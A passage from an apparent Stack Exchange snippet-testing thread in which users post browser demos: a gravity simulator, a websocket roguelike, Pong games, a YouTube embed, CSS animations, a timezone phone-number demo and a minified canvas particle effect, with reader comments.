  let maxH = HEIGHT / cellSize,
    maxW = WIDTH / cellSize;
  for (let h = 0; h <= maxH; h++) {
    let row = [];    
    for (let w = 0; w <= maxW; w++) {
      row.push([0,0]);
    }
    gField.push(row);
  }
  gHeight = gField.length;
  gWidth = gField[0].length
}

function drawFieldAndObjects(){
  ctx.clearRect(0, 0, WIDTH, HEIGHT);
  if (showFabric) {
    drawGravityField();
  }
  drawObjects();
}

function drawObjects() {
  for (let i = 0; i < numObjects; i++) {
    drawObject(stellarObjects[i]);
  }
  if (isPlanting) {
    drawCursorLine();
  }
}

function drawCursorLine() {
  ctx.beginPath();
  ctx.strokeStyle = CURSOR_LINE_COLOR;
  ctx.moveTo(plantX, plantY);
  ctx.lineTo(mouseX, mouseY);
  ctx.stroke();
  ctx.closePath();
  let dist = getDistance(mouseX-plantX,mouseY-plantY);
  ctx.fillStyle = CURSOR_LINE_COLOR;
  ctx.fillText(dist,mouseX+10, mouseY-10);
}

function drawObject(o) {
  let x = o.x,
    y = o.y,
    radius = o.size;
  ctx.beginPath();
  ctx.arc(x, y, radius, 0, TWOPI);
  ctx.fillStyle = o.color;
  ctx.fill();
  ctx.globalAlpha = 0.2;
  ctx.strokeStyle = OBJECT_BORDER_COLOR;
  ctx.arc(x, y, radius, 0, TWOPI);
  ctx.stroke();
  ctx.globalAlpha = 1;
  ctx.closePath();
}

function drawGravityField() {
  ctx.strokeStyle = GRAVITY_FIELD_MARKER_COLOR;
  for (let i = 0; i < gHeight; i++) {
    let row = gField[i], iMeasure = i * cellSize;
    for (let j = 0; j < gWidth; j++) {
      drawVectorDot(j * cellSize, iMeasure, row[j]);
    }
  }
}

function drawVectorDot(x, y, vector) {
  let vx = vector[0],
    vy = vector[1];  
  ctx.globalAlpha = fadeMultiplier / Math.sqrt(vx*vx + vy*vy); // the farther the marker is pulled, the more it fades from view
  ctx.beginPath();
  ctx.arc(x + vx, y + vy, GRAVITY_FIELD_MARKER_RADIUS, 0, TWOPI);
  ctx.stroke();
  ctx.globalAlpha = 1;
}

function getRandomStellarObject() {
 let multiplier = objectSize === 0 ? Math.random() : objectSize;
  let randomMass = MIN_RND_MASS + multiplier * (MAX_RND_MASS - MIN_RND_MASS);  
  let randomSize = Math.pow(3 * randomMass / 4 / PI, 1 / 3) * SCALE, // size formula based on volume of a sphere
    randomColor = objectColor === "" ? getRandomColor() : objectColor;
  let velocity = Math.random() * MAX_RND_VEL;
  let xComponent = Math.random() * velocity;
  return {
    color: randomColor,
    size: randomSize,
    mass: randomMass,
    x: WIDTH / 6 + (2 * WIDTH / 3 * Math.random()),
    y: HEIGHT / 6 + (2 * HEIGHT / 3 * Math.random()),
    velocity: {
      x: (Math.random() * 2 > 1 ? -1 : 1) * Math.sqrt(xComponent),
      y: (Math.random() * 2 > 1 ? -1 : 1) * Math.sqrt(velocity - xComponent)
    },
    acc:{
     x:0,y:0,xh:0,yh:0
    },
    oldAcc: {
     x:0,y:0
    },
    massEffect: randomMass * G
  }
}
function getStellarObject(color,multiplier,x,y, xv, yv){
 let mass = MIN_RND_MASS + multiplier * (MAX_RND_MASS - MIN_RND_MASS);
  let size = Math.pow(3 * mass / 4 / PI, 1 / 3) * SCALE;
  return {color:color, size:size, mass:mass, x: x, y:y, velocity:{x:xv,y:yv},acc:{x:0,y:0,xh:0,yh:0}, oldAcc:{x:0,y:0},massEffect:mass*G};
  
}
function getDistance(difX, difY) {
  return Math.sqrt(difX * difX + difY * difY);
}

function getRandomColor() {
  return "rgb(" + (Math.random() * 256 >>> 0) + "," + (Math.random() * 256 >>> 0) + "," + (Math.random() * 256 >>> 0) + ")";
}
```

```css
#AutoStep {
  font-weight: bold;
}

canvas {
  cursor: crosshair;
  background-color: black;
  border: 1px solid black;
  vertical-align: text-top;
  -ms-touch-action: none;
}

input,
.controls {
  font-size: 12pt;
  font-family: Calibri;
}

input {
  padding: 2px;
}

.controls {
  text-align: center;
  background-color: #bfbfbf;
  display: inline-block;
  vertical-align: text-top;
  border: 1px solid black;
}

label {
  cursor: pointer;
}

.container {
  display: inline-block;
  width: 552px;
}

.controls .inner {
  display: inline-block;
}

.controls .section {
  text-align: left;
  background-color: #dfdfdf;
  border: 1px solid #9f9f9f;
  padding: 2px;
  margin: 1px;
  display: inline-block;
  vertical-align: text-top;
}
```

```html
<div class="container">
  <div class="controls">
    <div class="section">
      <input type="button" id="Reset" value="Reset" />
    </div>
    <div class="section">
      <div class="inner">
        <input type="button" id="NextStep" value="Next" />
        <input type="button" id="AutoStep" value="Auto" />
      </div>
      <div class="inner">Delay:
        <select id="Delay">
          <options>
            <option value=0 selected="selected">none</option>
            <option value=10>10 ms</option>
            <option value=15>15 ms</option>
            <option value=30>30 ms</option>
            <option value=60>60 ms</option>
            <option value=500>500ms</option>
            <option value=1000>1 sec</option>
          </options>
        </select>
      </div>
    </div>
    <div class="section">Border:
      <select id="BorderBehavior">
        <options>
          <option value="Annihilate">Annihilate</option>
          <option selected="selected" value="Unbounded">Unbounded</option>
          <option value="Loop">Loop</option>
          <option value="Ricochet">Ricochet</option>
          <option value="HalfRicochet">50% Ricochet</option>
        </options>
      </select>
    </div>
    <div class="section">
      Object Size: 
      <select id="ObjectSize">
      <options>
        <option value=0>Random</option>
        <option value=1>100%</option>
        <option value=.9>90%</option>
        <option value=.75>75%</option>
        <option value=.5>50%</option>
        <option value=.25>25%</option>
        <option value=.1>10%</option>
        <option value=.05>5%</option>
        <option value=.01>1%</option>
        <option value=.009>0.90%</option>
        <option value=.005>0.50%</option>
        <option value=.0025>0.25%</option>
        <option value=.001>0.10%</option>
        <option value=.0001 selected="selected">0.01%</option>
      </options>
      </select>
      <br/>
      Object Color:
      <select id="ObjectColor">
      <options>
        <option value="">Random</option>
        <option value="red">Red</option>
        <option value="magenta">Magenta</option>
        <option value="orange">Orange</option>
        <option value="yellow">Yellow</option>
        <option value="green">Green</option>
        <option value="lightgreen">Light Green</option>
        <option value="blue">Blue</option>
        <option value="cyan">Cyan</option>
        <option value="indigo">Indigo</option>
        <option value="violet">Violet</option>        
        <option value="brown">Brown</option>
        <option value="gray">Gray</option>
        <option value="white"  selected="selected">White</option>
      </options>
      </select>
    </div>
    <div class="section">
      <label>
        <input type="checkbox" id="ShowFabric"/>Show Fabric</label>
      <div>Granularity:
        <select id="FabricGranularity">
          <options>
            <option value="5">5</option>
            <option value="7">7</option>
            <option value="10">10</option>
            <option value="13">13</option>
            <option value="15">15</option>
            <option value="20" selected="selected">20</option>
            <option value="30">30</option>
          </options>
        </select>
      </div>
    </div>
    <div class="section">
    <div class="inner">
    <label for="chkTrack"><input type="checkbox" id="chkTrack"  checked="checked"/>Track</label>
    </div>
    </div>
    <div class="section">
      <div class="inner">
        <label for="chkCollisions">
          <input type="checkbox" checked="checked" id="chkCollisions" />Handle Collisions</label>
      </div>
      <div>Restitution:
        <select id="Restitution">
          <options>
            <option value=1>1.0</option>
            <option value=0.95 selected="selected">0.95</option>
            <option value=0.9>0.9</option>
            <option value=0.8>0.8</option>
            <option value=0.7>0.7</option>
            <option value=0.6>0.6</option>
            <option value=0.5>0.5</option>
            <option value=0.4>0.4</option>
            <option value=0.3>0.3</option>
            <option value=0.2>0.2</option>
            <option value=0.1>0.1</option>
            <option value=0.0>0.0</option>
          </options>
        </select>
      </div>
    </div>

  </div>
  <canvas id="canvas" height="550" oncontextmenu="return false;" width="550">no canvas available</canvas>
</div>
```

Answer (score 7):

**Multiplayer Websocket test!** Hack you fellow Stackians to bits! I hope you know your HJKL Nethack key controls... (I'm afraid you'll need to fullscreen this one to make it actually playable.)

```js
ROT.RNG.setSeed(12345);
ROT.DEFAULT_WIDTH = 83;
ROT.DEFAULT_HEIGHT = 32;

var id, level = 1;
var mapData = [];
var inventory = [];
var inventoryUp = false;
var health = 10;
var entities = [];

var display = new ROT.Display({fontSize:11});
document.getElementById("canvasContainer").appendChild(display.getContainer());

var socket = io.connect('https://taggem-apsillers.rhcloud.com:8443');
socket.emit("player");
socket.on("map+pos", function(updates) { redraw(updates.map, updates.pos); });
socket.on("map", function(mapUpdates) { redraw(mapUpdates, {}); });
socket.on("pos", function(pos) { redraw({}, pos); });
socket.on("id", function(myid) {
    id = myid;

    display.clear();

    level = 1;
    mapData = [];
    inventory = [];
    inventoryUp = false;
    health = 10;
    entities = [];

    entities[1] = {};
    messages = [];

    initMapLevel(1);
});

socket.on("inventory", function(data) {
    if(data.change == "add") {
        inventory[data.slot] = data.item;
    } else if(data.change == "remove") {
        delete inventory[data.slot];
    }
});

socket.on("health", function(data) { health = data.value; drawHealth(data.value); });
function drawHealth(value) {
    for(var i=0; i < value; ++i) {
        display.draw(82, 10-i, "o", "#F00", "#000");
    }

    for(;i<10; ++i) {
        display.draw(82, 10-i, "-", "#F00", "#000");
    }
}

function initMapLevel(level) {
    mapData[level] = [];
    for(var i=0; i < ROT.DEFAULT_WIDTH; ++i) {
        for(var j=0; j < ROT.DEFAULT_HEIGHT; ++j) {
            if(mapData[level][i] == null) { mapData[level][i] = []; }
            mapData[level][i][j] = -1;
        }
    }
}

var dirToVector = {};
dirToVector[ROT.VK_H] = { x:-1, y:0};
dirToVector[ROT.VK_L] = { x:1, y:0};
dirToVector[ROT.VK_K] = { x:0, y:-1};
dirToVector[ROT.VK_J] = { x:0, y:1};
dirToVector[ROT.VK_LEFT] = { x:-1, y:0};
dirToVector[ROT.VK_RIGHT] = { x:1, y:0};
dirToVector[ROT.VK_UP] = { x:0, y:-1};
dirToVector[ROT.VK_DOWN] = { x:0, y:1};
dirToVector[ROT.VK_Y] = { x:-1, y:-1};
dirToVector[ROT.VK_U] = { x:1, y:-1};
dirToVector[ROT.VK_B] = { x:-1, y:1};
dirToVector[ROT.VK_N] = { x:1, y:1};

var keyToItem = {};
for (i = 0; i < 10; i++) {
  keyToItem[i + "0".charCodeAt(0)] = i;
}

var interpreters = {};
interpreters[ROT.VK_I]     = 
  function () {
    showInventory();
    interpCallback = function (key) {
      hideInventory();
      interpCallback = defaultInterpreter;
      if (key != ROT.VK_I) {
        defaultInterpreter(key);
      }
    };
  };
interpreters[ROT.VK_Z]     = DirCommand("zap");
interpreters[ROT.VK_A]     = DirCommand("mine");
interpreters[ROT.VK_S]     = ItemDirCommand("shoot");
interpreters[ROT.VK_O]     = DirCommand("open");
interpreters[ROT.VK_C]     = DirCommand("close");
interpreters[ROT.VK_COMMA] = Command("pickup");
interpreters[ROT.VK_D]     = ItemCommand("drop");

for (moveKey in dirToVector) {
  interpreters[moveKey] = (function (key) {
      return function () { socket.emit("move", dirToVector[key]); }
    })(moveKey);
}

interpreters[ROT.VK_ESCAPE] = function () { 
    hideInventory(); 
    interpCallback = defaultInterpreter;
};

var defaultInterpreter = function (key) {
  if (key in interpreters) {
    interpreters[key]();
  }
};

var interpCallback = defaultInterpreter;

function makeCB(f) {
  return function (k) {
    if (!f(k)) {
      interpCallback = defaultInterpreter;
    }
  }
};


function Command (action) {
  return function () {
    socket.emit(action);
  }
}

function DirCommand (action) {
  return function () {
    interpCallback = makeCB( function (key) {
        vec = dirToVector[key];
        if (vec) {
          socket.emit(action, vec);
        }
      });
  }
}

function ItemCommand (action) {
  return function () {
    interpCallback = makeCB( function (key) {
        item = keyToItem[key];
        if (item <= 9 && item >= 0) {
          socket.emit(action, {"itemNum":item});
        }
      });
  }
}

function ItemDirCommand (action) {
  return function () {
    interpCallback = makeCB( function (key) {
        item = keyToItem[key];
        if (item == undefined) {
          item = defaultItemForAction(action);
          vec = dirToVector[key];
          if (vec) {
            vec.itemNum = item;
            socket.emit(action, vec);
          }
        }
        else if (item <= 9 && item >= 0) {
          interpCallback = makeCB( function (key) {
              vec = dirToVector[key];
              if (vec) {
                vec.itemNum = item;
                socket.emit(action, vec);
              }
            });
          return true;
        }
      });
  }
}


window.addEventListener("keydown", function (e) {
    var code = e.keyCode;
    interpCallback(code);
  });

   
function drawMap(mapUpdates) {

    if(typeof mapData[level] == 'undefined') { initMapLevel(level); }

    for(i in mapUpdates) {
        var coords = i.split(',');
        mapData[level][coords[0]][coords[1]] = mapUpdates[i];
    }

    for(i=0; i < ROT.DEFAULT_WIDTH; ++i) {
        for(j=0; j < ROT.DEFAULT_HEIGHT; ++j) {
            drawMapChar(i, j, mapData[level][i][j]==0?".":" ", "#fff", ["#000", "#777"][mapData[level][i][j]]);
        }
    }
}

function updateEntities(posData) {
    var i;
    if(posData.clear) { entities[level] = {}; }

    if(posData["add"]) {
        for(i in posData["add"]) {
            entities[level][i] = posData["add"][i];
        }
    }

    if(posData["remove"]) {
        for(i=0; i<posData["remove"].length; ++i) {
            delete entities[level][posData["remove"][i]];
        }
    }
}

function drawEntities() {
    for(i in entities[level]) {
        var pos = entities[level][i];

        if(pos.blocking) { drawMapChar(pos.x, pos.y, pos.symbol, pos.color); }
        else {
            var hasBlocking = false;
            for(var j in entities[level]) {
                if(entities[level][j].blocking && entities[level][j].x == pos.x && entities[level][j].y == pos.y) {
                    hasBlocking = true;
                    break;
                }
            }
            if(!hasBlocking) { drawMapChar(pos.x, pos.y, pos.symbol, pos.color); }
        }
    }
}

function redraw(map, posData) {

    if(posData["add"] && posData["add"][id] != undefined) {
        level = posData["add"][id].z;
        if(entities[level] == undefined) { entities[level] = {}; }
    }

    updateEntities(posData);

    drawMap(map);
    drawEntities();

    drawHealth(health);
}

function drawMapChar(x,y,ch,fg,bg) {
    if(!inventoryUp || ((x < 2 || x > 36) && (y < 4 || y > 14))) {
        display.draw(x, y+2, ch, fg, bg);
    }
}

function showInventory() {
    inventoryUp = true;
    var thirtySpaces = "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0";
    display.drawText(2, 3, "--------------------------------");
    display.drawText(2, 4, ("| Inventory" + thirtySpaces).substr(0,30) + " |");
    var invCount = 0;
    for(var i=0; i<10; ++i) {
        if(inventory[i]) {
            display.drawText(2, invCount+5, ("| " + i + ": " + inventory[i].name + thirtySpaces).substr(0,30) + " |", 34);
            invCount++;
        }
    }
    for(i=0; i<10 - invCount; ++i) {
        display.drawText(2, invCount+i+5, "| " + thirtySpaces + " |", 34);
    }
    display.drawText(2, invCount+i+5, "--------------------------------");
}

function hideInventory() {
    inventoryUp = false;
    redraw({}, {});
}

function defaultItemForAction(actionName) {
    if(actionName == "shoot") {
        for(var i=0; i<inventory.length; ++i) {
            if(inventory[i] && inventory[i].shootable) return i;
        }
    }

    return null;
}

function showMessage(m) {
    display.drawText(0, 0, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", "#000", "#000");
    display.drawText(0, 1, "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", "#000", "#000");
    display.drawText(0,  0, m);
}

socket.on("output", function(m) {
    showMessage(m);
});
```

```html
<div id="canvasContainer" style="float:left; border: thick solid black;"></div>l

<div style="float:left;">
<div style="width:400px; padding: 10px;">
<ul>
<li><b>arrow keys</b>: movement</li>
<li><b>h,j,k,l</b>: left, down, up, right</li>
<li><b>i</b>: show inventory</li>
<li><b>,</b> (comma): pick up items</li>
<li><b>o</b> <i>[direction]</i>: open door in [direction]</li>
<li><b>c</b> <i>[direction]</i>: close door in [direction]</li>
<li><b>d</b> <i>[number]</i>: drop item in slot [number]</li>
<li><b>s</b> <i>[number] [direction]</i>: shoot item [number] in [direction] (e.g., <b>s2h</b> shoots item in slot 5 to the left)</li>
<li><b>s</b> <i>[direction]</i>: shoot the first shootable item in your inventory in [direction]</li>
</ul>
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/0.9.16/socket.io.min.js"></script>
<script src="https://ondras.github.io/rot.js/rot.js"></script>
```

Comment: Argh - I can't move with `hjkl`. Can you add support for `WASD` and/or the arrow keys?

Comment: @Bergi Added support for arrow keys.

Comment: Wow awesome game, but I can walk through walls, is it right that way? O.o

Comment: @modiX Of course you can't wall though wall -- you can *dig* through walls! `:P :)` (But seriously, the difference is that you must step once to dig and then step again to move into the space you dug, so you move at half-speed through walls.) At some point, I'll add a pickaxe item and make it so you can only dig when you're holding one.

Comment: @apsillers That's awesome. A really funny nerdy game! :)

Answer (score 7):

After all, who doesn't love pong :)

**Commands:**

Control left paddle with <kbd>w</kbd> and <kbd>s</kbd>
Control right paddle with <kbd>↑</kbd> and <kbd>↓</kbd>

Hit <kbd>enter</kbd> to restart
Hit <kbd>space</kbd> to pause
Hit <kbd>a</kbd> to turn on the automatic mode for the left paddle

```html
<!DOCTYPE html>
<html>
<body>

<div id="gameArea">
  <canvas id="canvas"></canvas>
  <div id="statsPanel"></div>
</div>
<!-- Jquery -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"></script>
<style>
html, body {
background: #171700;
}

canvas {
    position:fixed;
left:0;
top:0;
width:100%;
height:100%;
    background: #171700;
    
}
</style>
<script>
var ar=new Array(32, 33,34,35,36,37,38,39,40);

$(document).keydown(function(e) {
 var key = e.which;
  //console.log(key);
  //if(key==35 || key == 36 || key == 37 || key == 39)
  if($.inArray(key,ar) > -1) {
  e.preventDefault();
  return false;
  }
  return true;
});
var canvas = document.getElementById("canvas"),
ctx = canvas.getContext("2d");

canvas.width = window.innerWidth;
canvas.height = window.innerHeight-50;

rectw = 6.333;
recth = 50;

var player1 = {
x: 50,
y: canvas.height/2-recth/2,
velY: 0,
velX: 0,
color: getRandomColor(),
},
player2 = {
x: canvas.width-(50+rectw),
y: canvas.height/2-recth/2,
velY: 0,
velX: 0,
color: getRandomColor(),
};
multiply = [-1, 1];
var choice = multiply[Math.floor(Math.random() * multiply.length)];
temp = getRandomInt(0.5, 2.5);
choice = multiply[Math.floor(Math.random() * multiply.length)];
temp2 = choice*Math.sqrt(8-Math.pow(temp, 2));
temp*=-1;
circle = {
x: canvas.width/2-rectw/2,
y: canvas.height/2-recth/2,
velY: temp,
velX: temp2,
color: getRandomColor(),
}
var x = 150,
y = 150,
velY = 0,
velX = 0,
speed = 2,
friction = 0.98,
keys = [];
auto = false;
score1 = score2 = 0;

var atime = ptime = getTime();
function getTime(){
return(new Date().getTime() / 1000);
}
col1 = getRandomColor();
col2 = getRandomColor();
col3 = getRandomColor();
tempX = 0
tempY = 0
paused = false;

function update() {
if (keys[38]) {
    if (player2.velY > -speed) {
        player2.velY--;
    }
}

if (keys[40]) {
    if (player2.velY < speed) {
        player2.velY++;
    }
}
if (keys[65]) {
    if(getTime()-atime > 0.75){
        if (auto == false){
            auto = true;
        }else{
            auto = false;
        }
        atime = getTime();
    }
}
if (keys[32]) {
    if(getTime()-ptime > 0.75){
      if(paused == false){
        tempX = circle.velX;
        tempY = circle.velY;
        circle.velX = circle.velY = 0;
        paused = true;
      }else{
        circle.velX = tempX;
        circle.velY = tempY;
        paused = false;
      }
      ptime = getTime();
    }
}
if (keys[13]){
  multiply = [-1, 1];
  var choice = multiply[Math.floor(Math.random() * multiply.length)];
  temp = getRandomInt(0.5, 2.5);
  choice = multiply[Math.floor(Math.random() * multiply.length)];
  temp2 = choice*Math.sqrt(8-Math.pow(temp, 2));
  temp*=-1;
  circle.x = canvas.width/2-rectw/2;
  circle.y = canvas.height/2-recth/2;
  circle.velX = circle.velY = 0;
  
  setTimeout(function(){
    score1=score2=0;
    circle = {
      x: canvas.width/2-rectw/2,
      y: canvas.height/2-recth/2,
      velY: temp,
      velX: temp2,
      color: getRandomColor(),
    }
  }
  , 3000);
}
if (keys[67]){
  col1 = getRandomColor();
  col2 = getRandomColor();
  col3 = getRandomColor();
  player1.color = getRandomColor();
  player2.color = getRandomColor();
  circle.color = getRandomColor();
}
if (auto == false){
    if (keys[87]) {
        if (player1.velY > -speed) {
            player1.velY--;
        }
    }

    if (keys[83]) {
        if (player1.velY < speed) {
            player1.velY++;
        }
    }
}else{
    player1.y = circle.y-recth/2;
    player1.velY = 0;
}


ctx.clearRect(0, 0, canvas.width, canvas.height);
ctx.font = "30px Verdana";
// Create gradient
var gradient = ctx.createLinearGradient(0, 0, canvas.width, 0);
gradient.addColorStop("0", col1);
gradient.addColorStop("0.5", col2);
gradient.addColorStop("1.0", col3);
// Fill with gradient
ctx.fillStyle = gradient;
ctx.fillText(score1, 100, 90);
ctx.fillText(score2, canvas.width-160, 90);
updatePlayer(player1);
updatePlayer(player2);
updateCircle(circle, player1, player2);
setTimeout(update, 10);
document.title = score1+", "+score2;
}

function getRandomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}

var audio = new Audio('http://www.mediacollege.com/downloads/sound-effects/alien/alien-noise-01.ogg');

function updateCircle(player, play1, play2) {
player.y += player.velY;
player.x += player.velX;

if (player.x >= canvas.width-(50+rectw)) {
if (play2.y <= player.y && player.y <= play2.y+recth){
        player.x = canvas.width-(50+rectw);
     player.velX*=-1;
        play2.color = getRandomColor();
        player.color = getRandomColor();
        col1 = getRandomColor();
        col2 = getRandomColor();
        col3 = getRandomColor();
        audio.play();
                    
}else{
  player.x = canvas.width/2-rectw/2;
  player.y = canvas.height/2-recth/2;
        multiply = [-1, 1];
        var choice = multiply[Math.floor(Math.random() * multiply.length)];
        temp = getRandomInt(0.5, 2.5);
        choice = multiply[Math.floor(Math.random() * multiply.length)];
        temp2 = choice*Math.sqrt(8-Math.pow(temp, 2));
        temp*=-1;
        player.velY = temp;
        player.velX = temp2;
        score1++;
}
} else if (player.x <= 60) {
if (play1.y <= player.y && player.y <= play1.y+recth){
     player.x = 60;
     player.velX*=-1
        play1.color = getRandomColor();
        player.color = getRandomColor();
        col1 = getRandomColor();
        col2 = getRandomColor();
        col3 = getRandomColor();
        audio.play();
    }else{
        player.x = canvas.width/2-rectw/2;
        player.y = canvas.height/2-recth/2;
        multiply = [-1, 1];
        var choice = multiply[Math.floor(Math.random() * multiply.length)];
        temp = getRandomInt(0.5, 2.5);
        choice = multiply[Math.floor(Math.random() * multiply.length)];
        temp2 = choice*Math.sqrt(8-Math.pow(temp, 2));
        temp*=-1;
        player.velY = temp;
        player.velX = temp2;
        score2++;
    }
}

if (player.y > canvas.height-5) {
    player.y = canvas.height-5;
player.velY*=-1
} else if (player.y <= 5) {
    player.y = 5;
player.velY*=-1
}

ctx.fillStyle = player.color;
ctx.beginPath();
ctx.arc(player.x, player.y, 5, 0, Math.PI * 2);
ctx.fill();

}
function getRandomColor() {
/*    var letters = '0123456789ABCDEF'.split('');
var color = '#';
for (var i = 0; i < 6; i++ ) {
    color += letters[Math.floor(Math.random() * 16)];
}
return color;*/
return "whiteSmoke";
}

function updatePlayer(player) {

player.velY *= friction;
player.y += player.velY;

if (player.y > canvas.height-recth) {
    player.y = canvas.height-recth;
} else if (player.y <= 0) {
    player.y = 0;
}

ctx.fillStyle = player.color;
ctx.beginPath();
ctx.fillRect(player.x, player.y, 10, recth);
//    ctx.arc(player.x, player.y, 5, 0, Math.PI * 2);
ctx.fill();
}

update();

document.body.addEventListener("keydown", function (e) {
keys[e.keyCode] = true;
});
document.body.addEventListener("keyup", function (e) {
keys[e.keyCode] = false;
});
</script> 

</body>
</html>
```

Answer (score 6):

Youtube?

```html
No autoplay:<br />
<iframe width="420" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allowfullscreen></iframe>
<br />
?autoplay=1:<br />
<iframe width="420" height="315" src="https://www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1" frameborder="0" allowfullscreen></iframe>
```

Youtube!

Comment: Damn I hate `autoplay`. *Never gonna give you up, never gonna let you dooown...*

Comment: @Goodzilla: Did autoplay work for you? I got "undefined" in Chrome.

Comment: Actually it didn't, but that's due to my company computer blocking all embedded videos. I can see the black boxes where the videos would be.

Comment: @Haney: Question: was autoplay disabled?

Comment: Doesn't play in FF 31.

Comment: Wow, this crashed my browser. But maybe because it's Firefox Nighly. I can't make it crash again, though. Maybe because when I restarted it, an update was installed.

Answer (score 6):

#### 3D Button Test

```css
button {
  position: absolute;
  top: 50px;
  left: 50;
  height: 100px;
  width: 400px;
  transform: perspective(600px) rotateX(10deg) rotateY(10deg);
  transition: transform 0.2s;
}

button:hover {
  transform: perspective(600px) rotateX(-10deg) rotateY(10deg);
  transition: transform 0.2s;
}

button:active {
  transform: rotateX(45deg) rotateY(240deg) translateZ(0px);
  transition: 0.2s;
}

body {
  overflow: hidden;
}
```

```html
<button>Test</button>
```

Answer (score 5):

Demo for [Display a phone number based on the timezone](https://stackoverflow.com/questions/25494293/display-a-phone-number-based-on-the-timezone) on SO:

```js
var date = new Date();
var offset = date.getTimezoneOffset();  
function timezone ()
{
    var Phone, dest = document.getElementById('date_dependent');
    if (offset == 240) {
        Phone = "1-877-219-8830";
    } else if (offset == 300) {
        Phone = "1-866-878-7814";
    } else {
        Phone = "1-877-868-8121";
    }
  dest.innerHTML = Phone;
}
timezone();
```

```html
<div id="date_dependent">Who's calling?</div>
```

Comment: Because there are exactly 3 timezones in the world.

Comment: Nah, the OP only has 3 telephone numbers. All other zones are bound to (local) Office Hours only. Ever tried to register as an Apple Dev? You need to send a *fax*, during *their* PDT office hours.

Answer (score 5):

```css
#ejm17
{
         position:relative;
            width:200px;
           height:200px;
    border-radius:100px;
 background-color:#000;
           margin:0 auto;
}

#ejm17 p
{
          transition:all 4s ease-in-out;
 transition-property:top, left;
    transition-delay:1s, 0s;

            position:absolute;
                left:90px;
                 top:90px;
               width:20px;
              height:20px;
       border-radius:10px;
}

#ejm17 p + p + p { transition-delay:0s, 1s; }
#ejm17:hover p { left:180px; top:90px; }
#ejm17:hover p + p { left:90px; top:0; }
#ejm17:hover p + p + p { left:0; top:90px; }
#ejm17:hover p + p + p + p { left:90px; top:180px; }
```

```html
Move the mouse over the picture. 
<div id="ejm17">
 <p style="background-color:#fff;"></p>
 <p style="background-color:#f00;"></p>
 <p style="background-color:#0ff;"></p>
 <p style="background-color:#ff0;"></p>
</div>
```

Answer (score 5):

JavaScript art! (Warning: You want a better GPU if it looks laggy).

```js
!function(){function o(w,v,i){return w.getAttribute(v)||i}function j(i){return document.getElementsByTagName(i)}function l(){var i=j("script"),w=i.length,v=i[w-1];return{l:w,z:o(v,"zIndex",-1),o:o(v,"opacity",1.0),c:o(v,"color","255,255,0"),n:o(v,"count",40)}}function k(){r=u.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth,n=u.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight}function b(){e.clearRect(0,0,r,n);var w=[f].concat(t);var x,v,A,B,z,y;t.forEach(function(i){i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>r||i.x<0?-1:1,i.ya*=i.y>n||i.y<0?-1:1,e.fillStyle="rgba("+s.c+","+s.o+")",e.fillRect(i.x-0.5,i.y-0.5,1,1);for(v=0;v<w.length;v++){x=w[v];if(i!==x&&null!==x.x&&null!==x.y){B=i.x-x.x,z=i.y-x.y,y=B*B+z*z;y<x.max&&(x===f&&y>=x.max/2&&(i.x-=0.03*B,i.y-=0.03*z),A=(x.max-y)/x.max,e.beginPath(),e.lineWidth=A/2,e.strokeStyle="rgba("+s.c+","+(A+0.2)+")",e.moveTo(i.x,i.y),e.lineTo(x.x,x.y),e.stroke())}}w.splice(w.indexOf(i),1)}),m(b)}var u=document.createElement("canvas"),s=l(),c="c_n"+s.l,e=u.getContext("2d"),r,n,m=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(i){window.setTimeout(i,1000/45)},a=Math.random,f={x:null,y:null,max:20000};u.id=c;u.style.cssText="background-color:#000;position:fixed;top:0;left:0;z-index:"+s.z+";opacity:"+s.o;j("body")[0].appendChild(u);k(),window.onresize=k;window.onmousemove=function(i){i=i||window.event,f.x=i.clientX,f.y=i.clientY},window.onmouseout=function(){f.x=null,f.y=null};for(var t=[],p=0;s.n>p;p++){var h=a()*r,g=a()*n,q=2*a()-1,d=2*a()-1;t.push({x:h,y:g,xa:q,ya:d,max:6000})}setTimeout(function(){b()},100)}();
```

Answer (score 4):

### Real-time Virtual Reality Simulation

This is **really** old. Don't judge.

```js
var ball;
var rpad;
var lpad;

function makeBall(x,y,speedx,speedy)
{
 var ball = document.getElementById("ball");

 ball.x = x;
 ball.y = y;

 ball.speedX = speedx;
 ball.speedY = speedy;

 ball.width = ball.offsetWidth - 4;
 ball.height = Math.ceil(ball.width * 8 / 9);

 ball.yOffset = Math.round((ball.offsetHeight - ball.height) * 4 / 7 );

 //TODO: tweak this
 if(navigator.appName != "Internet Explorer")
  ball.yOffset += 9;

 ball.step = function()
 {
  // new position
  this.x += this.speedX;
  this.y += this.speedY;


  // check bounds
  if(this.speedX >= 0) {
   if((this.x + this.width) > rpad.offsetLeft) {
    this.speedX = -this.speedX;
    this.x = rpad.offsetLeft - this.width;
   }
  }
  if(this.speedX <= 0) {
   if(this.x < (lpad.offsetLeft + lpad.offsetWidth)) {
    this.speedX = -this.speedX;
    this.x = lpad.offsetLeft + lpad.offsetWidth;
   }
  }
  if(this.speedY >= 0) {
   if((this.y + this.height) > document.documentElement.offsetHeight) {
    this.speedY = -this.speedY;
    this.y = document.documentElement.offsetHeight - this.height;
   }
  }
  if(this.speedY <= 0) {
   if(this.y < 0) {
    this.speedY = -this.speedY;
    this.y = 0;
   }
  }

  // set new ball position
  this.style.left = (this.x - 2) + "px";
  this.style.top = (this.y - this.yOffset) + "px";

 }

 return ball;
}

